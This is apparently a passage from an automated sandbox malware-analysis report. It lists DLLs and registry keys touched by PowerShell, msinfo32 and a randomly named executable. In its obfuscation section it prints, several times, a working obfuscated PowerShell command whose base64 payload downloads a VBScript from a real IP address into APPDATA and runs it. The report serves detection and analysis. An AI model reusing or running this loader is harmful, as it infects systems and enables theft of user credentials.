                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Binary string: msinfo32.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000000.2024666715.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184131262.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncount
                      Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: msinfo32.exe, 00000010.00000002.2659047347.000000000543C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.0000000003010000.00000004.00000020.00020000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184403066.000000000282C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2412286934.00000000094AC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: msinfo32.pdbGCTL source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.pdb source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      PowerShell case anomaly found
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Suspicious command line found
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
